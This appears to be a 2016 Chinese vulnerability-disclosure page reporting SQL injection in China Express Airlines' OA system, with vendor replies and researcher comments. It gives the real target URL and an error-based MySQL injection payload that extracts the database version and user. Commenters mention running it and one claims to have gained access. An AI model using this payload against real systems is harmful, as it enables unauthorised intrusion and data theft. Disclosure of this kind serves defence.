航空安全之华夏航空某重要系统SQL注入

http://oa.g5air.com/

http://oa.g5air.com//interface/go.php?APP_UNIT=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(version(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271

mysql version：

http://oa.g5air.com//interface/go.php?APP_UNIT=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(version(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271

mysql version：

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-03-28 14:45

厂商回复：

我们没有购买通达oa互联互通组件。

最新状态：

暂无

1. 2016-03-28 19:58 | j14n ( 普通白帽子 | Rank:2226 漏洞数:398 )

   2

   这里我看过 没跑出来 哈哈

   1# 回复此人

2. 2016-03-29 09:37 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

   1

   厂商说不是你们的，可以是从你们的网站就跳转到此oa

   2# 回复此人

3. 2016-03-30 09:49 | Tasfa ( 路人 | Rank:3 漏洞数:3 | 分享分享)

   1

   这个是什么利用框架？

   3# 回复此人

4. 2016-03-30 12:29 | B1gstar ( 实习白帽子 | Rank:90 漏洞数:24 | 向各位学习来了。)

   1

   尴尬了。。。

   4# 回复此人

5. 2016-03-30 12:33 | j14n ( 普通白帽子 | Rank:2226 漏洞数:398 )

   1

   跑不出数据。

   5# 回复此人

6. 2016-03-30 16:07 | 枫子 ( 路人 | Rank:14 漏洞数:5 | 酱油安全爱好者一枚。)

   1

   @Tasfa msf

   6# 回复此人

7. 2016-03-30 17:23 | 小岳岳 ( 实习白帽子 | Rank:66 漏洞数:9 | DSRC_点融安全应急响应中心)

   1

   @j14n 确定是华夏航空的了。 @枫子 No。

   7# 回复此人

8. 2016-03-30 17:24 | j14n ( 普通白帽子 | Rank:2226 漏洞数:398 )

   1

   @小岳岳 这个确实是华夏航空.我也跑过,但是跑不出数据。。

   8# 回复此人

9. 2016-03-30 17:25 | 小岳岳 ( 实习白帽子 | Rank:66 漏洞数:9 | DSRC_点融安全应急响应中心)

   1

   @j14n 已经进去系统了。

   9# 回复此人

10. 2016-03-30 20:55 | 某个路人 ( 实习白帽子 | Rank:77 漏洞数:29 | 什么都不会，什么都要学)

    1

    通达的密码你是咋解密的？

    10# 回复此人

11. 2016-03-31 09:19 | 华夏航空有限公司(乌云厂商)

    1

    @某个路人 密码是加密了的，不过注入的确存在，感谢白帽子！

    11# 回复此人